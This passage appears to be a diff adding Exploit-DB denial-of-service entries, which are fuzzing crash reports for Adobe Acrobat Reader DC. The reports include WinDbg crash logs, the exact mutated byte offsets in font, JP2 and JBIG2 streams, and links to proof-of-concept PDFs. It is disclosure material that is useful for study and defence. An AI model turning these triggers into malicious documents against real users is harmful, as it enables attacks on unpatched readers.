_DPH_HEAP_ROOT @ 8e1000
in busy allocation ( DPH_HEAP_BLOCK: UserAddr UserSize - VirtAddr VirtSize)
53ab2af8: 57694e40 1c0 - 57694000 2000
66d6a8d0 verifier!AVrfDebugPageHeapAllocate+0x00000240
77304b26 ntdll!RtlDebugAllocateHeap+0x0000003c
7725e3e6 ntdll!RtlpAllocateHeap+0x000000f6
7725cfb7 ntdll!RtlpAllocateHeapInternal+0x000002b7
7725ccee ntdll!RtlAllocateHeap+0x0000003e
66e5aa2f vrfcore!VfCoreRtlAllocateHeap+0x0000001f
74a2f1f6 ucrtbase!_malloc_base+0x00000026
11e5fcd9 AcroRd32!AcroWinMainSandbox+0x00003ed9
13ae74d4 CoolType!CTInit+0x0000474d
13b50e2c CoolType!CTInit+0x0006e0a5
13b507bf CoolType!CTInit+0x0006da38
13b50736 CoolType!CTInit+0x0006d9af
13b506c3 CoolType!CTInit+0x0006d93c
13b5051c CoolType!CTInit+0x0006d795
13b50398 CoolType!CTInit+0x0006d611
13b5032b CoolType!CTInit+0x0006d5a4
13b50208 CoolType!CTInit+0x0006d481
13b1b3c0 CoolType!CTInit+0x00038639
13b0036d CoolType!CTInit+0x0001d5e6
13b01c20 CoolType!CTInit+0x0001ee99
13b05eff CoolType!CTInit+0x00023178
13b0036d CoolType!CTInit+0x0001d5e6
13b01c20 CoolType!CTInit+0x0001ee99
13b02229 CoolType!CTInit+0x0001f4a2
13b05c4d CoolType!CTInit+0x00022ec6
13b032ba CoolType!CTInit+0x00020533
13b031b3 CoolType!CTInit+0x0002042c
13b02ef7 CoolType!CTInit+0x00020170
13b02d85 CoolType!CTInit+0x0001fffe
13b0dad7 CoolType!CTInit+0x0002ad50
13b0d96f CoolType!CTInit+0x0002abe8
1201f455 AcroRd32!DllCanUnloadNow+0x00176495
0:018> kb
# ChildEBP RetAddr Args to Child
WARNING: Stack unwind information not available. Following frames may be wrong.
00 668dd378 13b45405 13d88404 56842dcc 00000001 CoolType!CTInit+0x6eec7
01 668dd394 13b44548 13d88284 275aacb0 668ddb48 CoolType!CTInit+0x6267e
02 668dd3a4 13b50fa7 668dd3f4 13d90130 668dd3e8 CoolType!CTInit+0x617c1
03 668ddb48 13b507bf 56842dcc 668ddb6c 668ddc08 CoolType!CTInit+0x6e220
04 668ddc00 13b50736 43730ff8 668ddc4c 69db2fa8 CoolType!CTInit+0x6da38
05 668ddc14 13b506c3 56842d70 668ddc4c 69db2fa8 CoolType!CTInit+0x6d9af
06 668ddc28 13b5051c 56842d70 668ddc4c 69db2fa8 CoolType!CTInit+0x6d93c
07 668ddc6c 13b50398 668ddd4c cbb06bb8 668ddd10 CoolType!CTInit+0x6d795
08 668ddc98 13b5032b 668ddd4c cbb06be0 668ddd10 CoolType!CTInit+0x6d611
09 668ddcc0 13b50208 631bcff0 668ddd4c cbb06bd0 CoolType!CTInit+0x6d5a4
0a 668ddcf0 13b1b3c0 631bcff0 668ddd4c cbb069cc CoolType!CTInit+0x6d481
0b 668ddeec 13b0036d 56842d70 668ddf24 cbb06868 CoolType!CTInit+0x38639
0c 668ddf48 13b01c20 13d71918 00000001 00000000 CoolType!CTInit+0x1d5e6
0d 668ddf78 13b05eff 56842d70 13d71918 00000001 CoolType!CTInit+0x1ee99
0e 668ddfb4 13b0036d 56842d70 668ddfec cbb05730 CoolType!CTInit+0x23178
0f 668de010 13b01c20 13d719d0 00000001 00000000 CoolType!CTInit+0x1d5e6
10 668de040 13b02229 56842d70 13d719d0 00000001 CoolType!CTInit+0x1ee99
11 668de074 13b05c4d 13d719d0 58fb2fc8 00000004 CoolType!CTInit+0x1f4a2
12 668de0ac 13b032ba 27594fc0 cbb05290 668de698 CoolType!CTInit+0x22ec6
13 668de5b0 13b031b3 56842d70 27594fc0 668de610 CoolType!CTInit+0x20533
14 668de5e8 13b02ef7 56842d70 27594fc0 668de610 CoolType!CTInit+0x2042c
15 668de62c 13b02d85 668de700 00000000 56842d00 CoolType!CTInit+0x20170
16 668de66c 13b0dad7 668de700 27594fc0 00000000 CoolType!CTInit+0x1fffe
17 668de6c8 13b0d96f 668de700 27594fc0 6e865226 CoolType!CTInit+0x2ad50
18 668de718 1201f455 670f0f08 13d72280 6e865226 CoolType!CTInit+0x2abe8
19 668de73c 1201e4e2 6e865226 00000001 00000000 AcroRd32!DllCanUnloadNow+0x176495
1a 668dfaa4 1201a692 668dfbf0 57586f68 00000005 AcroRd32!DllCanUnloadNow+0x175522
1b 668dfc8c 1201a2fe 668dfca0 5e3fea98 00000000 AcroRd32!DllCanUnloadNow+0x1716d2
1c 668dfce0 1201655c 668dfd70 57586f68 00000000 AcroRd32!DllCanUnloadNow+0x17133e
1d 668dfd98 120093ed 20425f7b 00000000 5e3fea98 AcroRd32!DllCanUnloadNow+0x16d59c
1e 668dfe78 12032848 00000000 00000000 00000000 AcroRd32!DllCanUnloadNow+0x16042d
1f 668dfed0 12032647 00000000 00000000 120320d0 AcroRd32!DllCanUnloadNow+0x189888
20 668dff3c 12031fec 20425e67 12031540 5f050ff8 AcroRd32!DllCanUnloadNow+0x189687
21 668dff64 12031551 15777c58 12031540 668dff88 AcroRd32!DllCanUnloadNow+0x18902c
22 668dff74 73cf8674 5f050ff8 73cf8650 4348ebff AcroRd32!DllCanUnloadNow+0x188591
23 668dff88 77285e17 5f050ff8 c74bea74 00000000 KERNEL32!BaseThreadInitThunk+0x24
24 668dffd0 77285de7 ffffffff 772aad8d 00000000 ntdll!__RtlUserThreadStart+0x2f
25 668dffe0 00000000 12031540 5f050ff8 00000000 ntdll!_RtlUserThreadStart+0x1b
--- cut ---
Notes:
- Reproduces on Adobe Acrobat Reader DC (2019.012.20035) on Windows 10, with and without PageHeap enabled (more cleanly with PageHeap, though).
- The crash occurs immediately after opening the PDF document, and is caused by an attempt to write data outside of an allocated buffer.
- Attached samples: poc1.pdf and poc2.pdf (crashing files), original.pdf (original file). We haven't been able to minimize the testcases as the PoC files are significantly mutated beyond simple bit flips.
Proof of Concept:
https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47275.zip

91
exploits/windows/dos/47276.txt Normal file
View file

@ -0,0 +1,91 @@
We have observed the following access violation exception in the latest version of Adobe Acrobat Reader DC for Windows, when opening a malformed PDF file:
--- cut ---
(4c84.1e3c): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=13842768 ebx=14b6d730 ecx=1383e108 edx=13832820 esi=13832850 edi=14b6d92c
eip=1062a82e esp=1383def0 ebp=1383def8 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010202
CoolType!CTInit+0x37aa7:
1062a82e 8902 mov dword ptr [edx],eax ds:002b:13832820=????????
0:022> u @eip-14
CoolType!CTInit+0x37a93:
1062a81a 8b7d0c mov edi,dword ptr [ebp+0Ch]
1062a81d 8b571c mov edx,dword ptr [edi+1Ch]
1062a820 8b7720 mov esi,dword ptr [edi+20h]
1062a823 035508 add edx,dword ptr [ebp+8]
1062a826 8b4724 mov eax,dword ptr [edi+24h]
1062a829 037508 add esi,dword ptr [ebp+8]
1062a82c 03c6 add eax,esi
1062a82e 8902 mov dword ptr [edx],eax
0:022> ? poi(edi+1c)
Evaluate expression: -56136 = ffff24b8
0:022> ? poi(ebp+8)
Evaluate expression: 327418728 = 13840368
0:022> !heap -p -a 13840368
address 13840368 found in
_DPH_HEAP_ROOT @ bd61000
in busy allocation ( DPH_HEAP_BLOCK: UserAddr UserSize - VirtAddr VirtSize)
bd639c0: 13840368 190c94 - 13840000 192000
unknown!fillpattern
66d6a8d0 verifier!AVrfDebugPageHeapAllocate+0x00000240
77304b26 ntdll!RtlDebugAllocateHeap+0x0000003c
7725e3e6 ntdll!RtlpAllocateHeap+0x000000f6
7725cfb7 ntdll!RtlpAllocateHeapInternal+0x000002b7
7725ccee ntdll!RtlAllocateHeap+0x0000003e
66e5aa2f vrfcore!VfCoreRtlAllocateHeap+0x0000001f
74a2f1f6 ucrtbase!_malloc_base+0x00000026
0e96fcd9 AcroRd32!AcroWinMainSandbox+0x00003ed9
105f74d4 CoolType!CTInit+0x0000474d
105f8888 CoolType!CTInit+0x00005b01
106270cf CoolType!CTInit+0x00034348
10626c61 CoolType!CTInit+0x00033eda
106265a2 CoolType!CTInit+0x0003381b
10623c6f CoolType!CTInit+0x00030ee8
10621d55 CoolType!CTInit+0x0002efce
106210e9 CoolType!CTInit+0x0002e362
1062096c CoolType!CTInit+0x0002dbe5
10620893 CoolType!CTInit+0x0002db0c
645138e1 AGM!AGMInitialize+0x0002aab1
0:022> kb
# ChildEBP RetAddr Args to Child
WARNING: Stack unwind information not available. Following frames may be wrong.
00 1383def8 1062a372 13840368 14b6d92c 13840368 CoolType!CTInit+0x37aa7
01 1383df6c 1062a296 1383e104 1383e034 00000001 CoolType!CTInit+0x375eb
02 1383df84 1062a277 1383e104 1383e034 16977160 CoolType!CTInit+0x3750f
03 1383df98 10629d00 1383e104 1383e034 16977160 CoolType!CTInit+0x374f0
04 1383dfb8 10629a71 1383e328 16977160 00000000 CoolType!CTInit+0x36f79
05 1383e158 10628ea7 16977160 108a00a0 1383e328 CoolType!CTInit+0x36cea
06 1383e3b4 10623e89 1383e6a8 1383e430 00000000 CoolType!CTInit+0x36120
07 1383e6d0 10621d55 00000001 00000000 00000000 CoolType!CTInit+0x31102
08 1383e7a0 106210e9 16d43ec0 00000009 1383e834 CoolType!CTInit+0x2efce
09 1383efb8 1062096c 188f40ec 1383efd0 188f40c8 CoolType!CTInit+0x2e362
0a 1383f038 10620893 188f40ec 188f40d4 393d9f99 CoolType!CTInit+0x2dbe5
0b 1383f070 645138e1 14c73e6c 188f40ec 10882280 CoolType!CTInit+0x2db0c
0c 1383f084 644ffb1e 188f40d4 644ffab0 1737c5f0 AGM!AGMInitialize+0x2aab1
0d 1383f098 644fe8e7 1737c5fc 649a09f8 00000001 AGM!AGMInitialize+0x16cee
0e 1383f0d0 6451041c 30146add 13db5c78 00000000 AGM!AGMInitialize+0x15ab7
0f 1383f17c 772fcd28 0ad60000 1383f1b0 66d6922c AGM!AGMInitialize+0x275ec
10 1383f190 00000000 66d69238 772fcd10 0ad64d80 ntdll!RtlReleaseStackTrace+0x18
--- cut ---
Notes:
- Reproduces on Adobe Acrobat Reader DC (2019.012.20035) on Windows 10, with and without PageHeap enabled (more cleanly with PageHeap, though).
- The crash occurs immediately after opening the PDF document, and is caused by an attempt to write data at a negative offset relative to a heap allocation (-56136 in the above case).
- Attached samples: poc.pdf (crashing file), original.pdf (original file).
- We have minimized the difference between the original and mutated files down to three bytes at offsets 0x2bd4c, 0x2bd4d and 0x2d5b8 (0x00 => 0xff in all cases). These bytes reside inside of a TrueType font stream.
Proof of Concept:
https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47276.zip

135
exploits/windows/dos/47277.txt Normal file
View file

@ -0,0 +1,135 @@
We have observed the following access violation exception in the latest version of Adobe Acrobat Reader DC for Windows, when opening a malformed PDF file:
--- cut ---
(2728.1fa8): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=fffd6880 ebx=1738cc84 ecx=0000078c edx=00000045 esi=14cf3f68 edi=1b884158
eip=6445cee9 esp=050fcab0 ebp=050fcac0 iopl=0 nv up ei ng nz na po cy
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00210283
JP2KLib!JP2KCopyRect+0x17ce9:
6445cee9 c6040100 mov byte ptr [ecx+eax],0 ds:002b:fffd700c=??
0:000> kb
# ChildEBP RetAddr Args to Child
WARNING: Stack unwind information not available. Following frames may be wrong.
00 050fcac0 6445cfea 1b884158 14cf3f68 1738cc84 JP2KLib!JP2KCopyRect+0x17ce9
01 050fcb24 6445b4ff 00000005 94f99e7b 00000003 JP2KLib!JP2KCopyRect+0x17dea
02 050fcb90 6445898e 00000005 94f998ff 00000000 JP2KLib!JP2KCopyRect+0x162ff
03 050fcd14 6444d2af 143ca8a0 ffffffff 00000005 JP2KLib!JP2KCopyRect+0x1378e
04 050fcd88 6444d956 00000000 00000005 00000008 JP2KLib!JP2KCopyRect+0x80af
05 050fcdec 6444dc90 00000000 00000005 00000008 JP2KLib!JP2KCopyRect+0x8756
06 050fce10 64465e4a 00000000 00000005 00000008 JP2KLib!JP2KCopyRect+0x8a90
07 050fce70 0f07e12e 1738cc00 00000000 00000005 JP2KLib!JP2KImageDecodeTileInterleaved+0x2a
08 050fcefc 0f04701b 00000000 050fcfa8 050fcfbc AcroRd32!AX_PDXlateToHostEx+0x3200de
09 050fcff4 0ef5ae8d 050fd014 050fd024 013e3626 AcroRd32!AX_PDXlateToHostEx+0x2e8fcb
0a 050fd038 645ada8c 16881638 050fd0a4 d6cb512b AcroRd32!AX_PDXlateToHostEx+0x1fce3d
0b 050fd0b4 645ae053 050fd100 d6cb5173 00000000 AGM!AGMGetVersion+0x16e3c
0c 050fd0ec 6484fb4c 189c6b24 050fd100 fffffffd AGM!AGMGetVersion+0x17403
0d 050fd104 64529a32 050fd198 d6cb5457 17432d88 AGM!AGMGetVersion+0x2b8efc
0e 050fd5c8 645275d6 050fdad8 17432d88 050fda4c AGM!AGMInitialize+0x40c02
0f 050fda6c 64524133 050fdad8 17432d88 050fdc6c AGM!AGMInitialize+0x3e7a6
10 050fdc8c 64522370 174201d0 14a51c28 1741d3b8 AGM!AGMInitialize+0x3b303
11 050fde68 64520dec 174201d0 14a51c28 d6cb5f2b AGM!AGMInitialize+0x39540
12 050fdeb4 6454ffbf 174201d0 14a51c28 172b6718 AGM!AGMInitialize+0x37fbc
13 050fded8 6454fa3e 00000201 6454fb7f 14a51c28 AGM!AGMInitialize+0x6718f
14 050fdee0 6454fb7f 14a51c28 d6cb5ed3 172b6718 AGM!AGMInitialize+0x66c0e
15 050fdf1c 644f8c6b 050fdff0 00000000 ffffffff AGM!AGMInitialize+0x66d4f
16 050fdf70 0ebccc6c 050fdfac 0ebccc73 013e3982 AGM!AGMInitialize+0xfe3b
17 050fdf78 0ebccc73 013e3982 172b6718 050fdf58 AcroRd32!DllCanUnloadNow+0x183cac
18 050fdfb4 0ebda604 16625154 013e0602 16625128 AcroRd32!DllCanUnloadNow+0x183cb3
19 050fdfe8 0ebda037 18cc864c 102872cc 0ebda4d2 AcroRd32!DllCanUnloadNow+0x191644
1a 050fdff4 0ebda4d2 013e0602 16625128 00000001 AcroRd32!DllCanUnloadNow+0x191077
1b 050fe01c 0ebed46a 013e067e 00000000 16625128 AcroRd32!DllCanUnloadNow+0x191512
1c 050fe060 0ebd9b8e 013e06b2 14ed7a00 16625128 AcroRd32!CTJPEGDecoderRelease+0x25da
1d 050fe0ac 0ebd994f 013e06ea 14ed7a00 050fe19c AcroRd32!DllCanUnloadNow+0x190bce
1e 050fe0f4 0ebd97d3 050fe110 013e077e 050fe4cc AcroRd32!DllCanUnloadNow+0x19098f
1f 050fe160 0ebd9607 050fe19c 148c73c0 406e5380 AcroRd32!DllCanUnloadNow+0x190813
20 050fe1c0 0ebd7e7d 148c73c0 0ebdad20 050fe4cc AcroRd32!DllCanUnloadNow+0x190647
21 050fe2c0 0ebd78d2 050fe4cc 013e0512 16bd8918 AcroRd32!DllCanUnloadNow+0x18eebd
22 050fe30c 0ebd6d6d 050fe4cc 050fe4d4 013e0396 AcroRd32!DllCanUnloadNow+0x18e912
23 050fe588 0ebd6b7e 00000002 174dc6da 013e03fa AcroRd32!DllCanUnloadNow+0x18ddad
24 050fe5e4 0eb9628a 00000002 174dc6da 013e0e82 AcroRd32!DllCanUnloadNow+0x18dbbe
25 050fe89c 0eb95168 13f5d0b0 050fe930 050fe980 AcroRd32!DllCanUnloadNow+0x14d2ca
26 050fe9a0 0eb94375 13f5d0b0 050fead0 00000000 AcroRd32!DllCanUnloadNow+0x14c1a8
27 050feaf4 0eb934ba 13f5d0b0 050febf8 00000000 AcroRd32!DllCanUnloadNow+0x14b3b5
28 050feb54 0eb9334d 13f5d0b0 050febf8 00000000 AcroRd32!DllCanUnloadNow+0x14a4fa
29 050feb74 0eb91f3c 13f5d0b0 050febf8 00000000 AcroRd32!DllCanUnloadNow+0x14a38d
2a 050fec2c 0eb91962 00000001 00000000 013e0a9a AcroRd32!DllCanUnloadNow+0x148f7c
2b 050fec84 0eb9177a 14743838 00000001 013e0af6 AcroRd32!DllCanUnloadNow+0x1489a2
2c 050fece8 0eb914ff 050feddc 013e0be2 173039e0 AcroRd32!DllCanUnloadNow+0x1487ba
2d 050fedfc 0ea566ec 173039e0 0ea56610 00000000 AcroRd32!DllCanUnloadNow+0x14853f
2e 050fee14 0ea5645f 0000000f 00000000 00000000 AcroRd32!DllCanUnloadNow+0xd72c
2f 050fee30 7460e0bb 012d017c 0000000f 00000000 AcroRd32!DllCanUnloadNow+0xd49f
30 050fee5c 74618849 0ea563a0 012d017c 0000000f USER32!_InternalCallWinProc+0x2b
31 050fee80 7461b145 0000000f 00000000 00000000 USER32!InternalCallWinProc+0x20
32 050fef50 74608503 0ea563a0 00000000 0000000f USER32!UserCallWinProcCheckWow+0x1be
33 050fefb8 74608aa0 0d640350 00000000 0000000f USER32!DispatchClientMessage+0x1b3
34 050ff000 77291a6d 050ff01c 00000020 050ff080 USER32!__fnDWORD+0x50
35 050ff038 76e92d3c 746091ee 050ff0d0 fc29c28c ntdll!KiUserCallbackDispatcher+0x4d
36 050ff03c 746091ee 050ff0d0 fc29c28c 0ce80b78 win32u!NtUserDispatchMessage+0xc
37 050ff090 74608c20 f926321c 050ff0b4 0ea6da8b USER32!DispatchMessageWorker+0x5be
38 050ff09c 0ea6da8b 050ff0d0 0ce80b78 0ce80b78 USER32!DispatchMessageW+0x10
39 050ff0b4 0ea6d81e 050ff0d0 013e1736 0ce80b78 AcroRd32!DllCanUnloadNow+0x24acb
3a 050ff128 0ea6d6b4 013e177e 0ce80b78 00000000 AcroRd32!DllCanUnloadNow+0x2485e
3b 050ff160 0e9fc556 013e17ce 0ce69870 00000000 AcroRd32!DllCanUnloadNow+0x246f4
3c 050ff1d0 0e9fbf81 0e9d0000 00af0000 0ce69870 AcroRd32!AcroWinMainSandbox+0x756
3d 050ff5f0 00af783d 0e9d0000 00af0000 0ce69870 AcroRd32!AcroWinMainSandbox+0x181
3e 050ff9bc 00bffd2a 00af0000 00000000 0c032f0a AcroRd32_exe+0x783d
3f 050ffa08 73cf8674 04f17000 73cf8650 f10c3998 AcroRd32_exe!AcroRd32IsBrokerProcess+0x9940a
40 050ffa1c 77285e17 04f17000 af8342f3 00000000 KERNEL32!BaseThreadInitThunk+0x24
41 050ffa64 77285de7 ffffffff 772aada9 00000000 ntdll!__RtlUserThreadStart+0x2f
42 050ffa74 00000000 00af1390 04f17000 00000000 ntdll!_RtlUserThreadStart+0x1b
0:000> !heap -p -a eax
address fffd6880 found in
_HEAP @ c030000
HEAP_ENTRY Size Prev Flags UserPtr UserSize - state
ffe1a018 37a00 0000 [00] ffe1a040 1bc858 - (busy VirtualAlloc)
66d6c27a verifier!AVrfpDphNormalHeapAllocate+0x000000ba
66d6a9fa verifier!AVrfDebugPageHeapAllocate+0x0000036a
77304b26 ntdll!RtlDebugAllocateHeap+0x0000003c
7725e3e6 ntdll!RtlpAllocateHeap+0x000000f6
7725cfb7 ntdll!RtlpAllocateHeapInternal+0x000002b7
7725ccee ntdll!RtlAllocateHeap+0x0000003e
66e5aa2f vrfcore!VfCoreRtlAllocateHeap+0x0000001f
74a2f1f6 ucrtbase!_malloc_base+0x00000026
e9ffcd9 AcroRd32!AcroWinMainSandbox+0x00003ed9
64468602 JP2KLib!JP2KTileGeometryRegionIsTile+0x00000182
64461432 JP2KLib!JP2KCopyRect+0x0001c232
644616dd JP2KLib!JP2KCopyRect+0x0001c4dd
644686c2 JP2KLib!JP2KTileGeometryRegionIsTile+0x00000242
6445ced4 JP2KLib!JP2KCopyRect+0x00017cd4
6445cfea JP2KLib!JP2KCopyRect+0x00017dea
6445b4ff JP2KLib!JP2KCopyRect+0x000162ff
6445898e JP2KLib!JP2KCopyRect+0x0001378e
6444d2af JP2KLib!JP2KCopyRect+0x000080af
6444d956 JP2KLib!JP2KCopyRect+0x00008756
6444dc90 JP2KLib!JP2KCopyRect+0x00008a90
64465e4a JP2KLib!JP2KImageDecodeTileInterleaved+0x0000002a
f07e12e AcroRd32!AX_PDXlateToHostEx+0x003200de
f04701b AcroRd32!AX_PDXlateToHostEx+0x002e8fcb
ef5ae8d AcroRd32!AX_PDXlateToHostEx+0x001fce3d
645ada8c AGM!AGMGetVersion+0x00016e3c
645ae053 AGM!AGMGetVersion+0x00017403
6484fb4c AGM!AGMGetVersion+0x002b8efc
64529a32 AGM!AGMInitialize+0x00040c02
645275d6 AGM!AGMInitialize+0x0003e7a6
64524133 AGM!AGMInitialize+0x0003b303
64522370 AGM!AGMInitialize+0x00039540
64520dec AGM!AGMInitialize+0x00037fbc
--- cut ---
Notes:
- Reproduces on Adobe Acrobat Reader DC (2019.012.20035) on Windows 10, with and without PageHeap enabled.
- The crash occurs immediately after opening the PDF document, and is caused by attempting to write data outside of a heap-based buffer.
- Attached samples: poc.pdf (crashing file), original.pdf (original file).
- We have minimized the difference between the original and mutated files down to a single byte inside of a binary JP2 image stream. The mutated byte is at offset 0x264a67 and was changed from 0x00 to 0xFE.
Proof of Concept:
https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47277.zip

86
exploits/windows/dos/47278.txt Normal file
View file

@ -0,0 +1,86 @@
We have observed the following access violation exception in the latest version of Adobe Acrobat Reader DC for Windows, when opening a malformed PDF file:
--- cut ---
(4970.179c): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=c0c0c0a0 ebx=00000000 ecx=c0c0c000 edx=c0c0c0a0 esi=66d6aa60 edi=00000000
eip=66d68718 esp=005bb01c ebp=005bb068 iopl=0 nv up ei ng nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00210286
verifier!AVrfpDphFindBusyMemoryNoCheck+0xb8:
66d68718 813abbbbcdab cmp dword ptr [edx],0ABCDBBBBh ds:002b:c0c0c0a0=????????
0:000> kb
# ChildEBP RetAddr Args to Child
00 005bb068 66d68835 009f1000 c0c0c0c0 00000000 verifier!AVrfpDphFindBusyMemoryNoCheck+0xb8
01 005bb08c 66d68ab0 009f1000 c0c0c0c0 005bb124 verifier!AVrfpDphFindBusyMemory+0x15
02 005bb0a8 66d6aaf0 009f1000 c0c0c0c0 00001000 verifier!AVrfpDphFindBusyMemoryAndRemoveFromBusyList+0x20
03 005bb0c4 77305359 009f0000 01000002 c0c0c0c0 verifier!AVrfDebugPageHeapFree+0x90
04 005bb134 7725ad86 c0c0c0c0 131a284b 00000000 ntdll!RtlDebugFreeHeap+0x3c
05 005bb290 7725ac3d 00000000 c0c0c0c0 005bb630 ntdll!RtlpFreeHeap+0xd6
06 005bb2e0 66e5aad0 009f0000 00000000 c0c0c0c0 ntdll!RtlFreeHeap+0x7cd
07 005bb2fc 74a2db1b 009f0000 00000000 c0c0c0c0 vrfcore!VfCoreRtlFreeHeap+0x20
08 005bb310 74a2dae8 c0c0c0c0 00000000 005bb330 ucrtbase!_free_base+0x1b
09 005bb320 12192849 c0c0c0c0 723baff0 005bc4cc ucrtbase!free+0x18
WARNING: Stack unwind information not available. Following frames may be wrong.
0a 005bb330 1282c991 c0c0c0c0 723baff0 12840782 AcroRd32!AcroWinMainSandbox+0x6a49
0b 005bc4cc 1283fa3b 726faf88 00000001 6d4befe8 AcroRd32!AX_PDXlateToHostEx+0x33e941
0c 005bc504 1283209f 5f3b4f54 5f3b4f54 7c2fcfb8 AcroRd32!CTJPEGTiledContentWriter::operator=+0x21ab
0d 005bc518 12825007 7c2fcfb8 00000044 52842f80 AcroRd32!AX_PDXlateToHostEx+0x34404f
0e 005bc5cc 122257c9 5f3b4f54 6e87cfb0 12225730 AcroRd32!AX_PDXlateToHostEx+0x336fb7
0f 005bc5f0 122256c3 57050fd8 00000001 00000028 AcroRd32!DllCanUnloadNow+0x4c809
10 005bc610 1267215a 005bc634 57050fd8 00000028 AcroRd32!DllCanUnloadNow+0x4c703
11 005bc654 1235a3a8 c0010000 0000000c 57050fd8 AcroRd32!AX_PDXlateToHostEx+0x18410a
12 005bc9a8 123598e6 005bca04 7333ca98 c9eeee9e AcroRd32!DllCanUnloadNow+0x1813e8
13 005bc9e0 123597c1 005bca04 7333ca98 005bca70 AcroRd32!DllCanUnloadNow+0x180926
14 005bca4c 12358788 c0010000 0000000c 7333ca98 AcroRd32!DllCanUnloadNow+0x180801
15 005bceac 12355cd7 005bd1b0 5eb4e5ac c0010000 AcroRd32!DllCanUnloadNow+0x17f7c8
16 005be68c 12355955 5eb4e5ac c0010000 0000000c AcroRd32!DllCanUnloadNow+0x17cd17
17 005be75c 123393ed c9eecf42 78356f78 00000000 AcroRd32!DllCanUnloadNow+0x17c995
18 005be83c 123381e8 00000001 00000000 00000000 AcroRd32!DllCanUnloadNow+0x16042d
19 005be888 1232b383 78356f78 00000000 00000000 AcroRd32!DllCanUnloadNow+0x15f228
1a 005be9fc 1232ac97 17822dbc 00000001 7f976ef8 AcroRd32!DllCanUnloadNow+0x1523c3
1b 005bea64 12328590 c9eecd9a 735a5e74 7f976ef8 AcroRd32!DllCanUnloadNow+0x151cd7
1c 005beae4 1232825a 7f976ef8 7302cf40 735a5e44 AcroRd32!DllCanUnloadNow+0x14f5d0
1d 005beb20 123a6099 7f976ef8 7302cf40 735a5e44 AcroRd32!DllCanUnloadNow+0x14f29a
1e 005bebf8 123a57f9 6a53efc8 00000000 7302cf40 AcroRd32!CTJPEGDecoderRelease+0x2b209
1f 005bec38 123a5717 6a53efc8 00000000 7302cf40 AcroRd32!CTJPEGDecoderRelease+0x2a969
20 005bec70 123a5669 00000000 7302cf40 005bedf0 AcroRd32!CTJPEGDecoderRelease+0x2a887
21 005bec8c 123a51ec 7302cf40 005bedf0 005bee08 AcroRd32!CTJPEGDecoderRelease+0x2a7d9
22 005bee54 123a4a8c 00000002 00000000 ffffffff AcroRd32!CTJPEGDecoderRelease+0x2a35c
23 005bf074 123a47d4 123a47a0 5f558f90 005bf0cc AcroRd32!CTJPEGDecoderRelease+0x29bfc
24 005bf084 121fed79 6abbb1b8 c9eed7b2 5dd08ff8 AcroRd32!CTJPEGDecoderRelease+0x29944
25 005bf0cc 121fe83d 000004df c9eed642 15c34fd8 AcroRd32!DllCanUnloadNow+0x25db9
26 005bf13c 121fe5d4 c9eed61a 15c34fd8 121fe560 AcroRd32!DllCanUnloadNow+0x2587d
27 005bf164 12194709 000004d3 00000000 12194270 AcroRd32!DllCanUnloadNow+0x25614
28 005bf180 7460e0bb 01340c64 00000113 000004d3 AcroRd32!AcroWinMainSandbox+0x8909
29 005bf1ac 74618849 12194270 01340c64 00000113 USER32!_InternalCallWinProc+0x2b
2a 005bf1d0 7461b145 00000113 000004d3 00000000 USER32!InternalCallWinProc+0x20
2b 005bf2a0 746090dc 12194270 00000000 00000113 USER32!UserCallWinProcCheckWow+0x1be
2c 005bf30c 74608c20 7b28fd14 005bf330 121fda8b USER32!DispatchMessageWorker+0x4ac
2d 005bf318 121fda8b 005bf34c 15b4fdd8 15b4fdd8 USER32!DispatchMessageW+0x10
2e 005bf330 121fd81e 005bf34c c9eed4da 15b4fdd8 AcroRd32!DllCanUnloadNow+0x24acb
2f 005bf3a4 121fd6b4 c9eed4a2 15b4fdd8 00000000 AcroRd32!DllCanUnloadNow+0x2485e
30 005bf3dc 1218c556 c9eed332 1489eff8 00000000 AcroRd32!DllCanUnloadNow+0x246f4
31 005bf44c 1218bf81 12160000 00af0000 1489eff8 AcroRd32!AcroWinMainSandbox+0x756
32 005bf86c 00af783d 12160000 00af0000 1489eff8 AcroRd32!AcroWinMainSandbox+0x181
33 005bfc38 00bffd2a 00af0000 00000000 00a0b3ba AcroRd32_exe+0x783d
34 005bfc84 73cf8674 007e2000 73cf8650 386b17d8 AcroRd32_exe!AcroRd32IsBrokerProcess+0x9940a
35 005bfc98 77285e17 007e2000 131a663b 00000000 KERNEL32!BaseThreadInitThunk+0x24
36 005bfce0 77285de7 ffffffff 772aada6 00000000 ntdll!__RtlUserThreadStart+0x2f
37 005bfcf0 00000000 00af1390 007e2000 00000000 ntdll!_RtlUserThreadStart+0x1b
--- cut ---
Notes:
- Reproduces on Adobe Acrobat Reader DC (2019.012.20035) on Windows 10, with and without PageHeap enabled, but most consistently with PageHeap (thanks to the allocation marker bytes).
- The crash occurs immediately after opening the PDF document, and is caused by passing an uninitialized value from the heap as an argument to the free() function. With PageHeap enabled, all new allocations are filled with the 0xc0c0c0... marker, which is visible in the crash log above.
- Attached samples: poc1.pdf and poc2.pdf (crashing files), original.pdf (original file).
- We have minimized the difference between the original and mutated files down to a single byte at offset 0x3bc, which appears to reside inside a JBIG2Globals object. It was modified from 0x00 to 0xB5 (in poc1.pdf) and to 0x35 (in poc2.pdf).
Proof of Concept:
https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47278.zip

117
exploits/windows/dos/47279.txt Normal file
View file

@ -0,0 +1,117 @@
We have observed the following crash in the latest version of Adobe Acrobat Reader DC for Windows, when opening a malformed PDF file:
--- cut ---
=======================================
VERIFIER STOP 00000007: pid 0x2C1C: Heap block already freed.
0C441000 : Heap handle for the heap owning the block.
147E6638 : Heap block being freed again.
00000010 : Size of the heap block.
00000000 : Not used
=======================================
This verifier stop is not continuable. Process will be terminated
when you use the `go' debugger command.
=======================================
(2c1c.491c): Break instruction exception - code 80000003 (first chance)
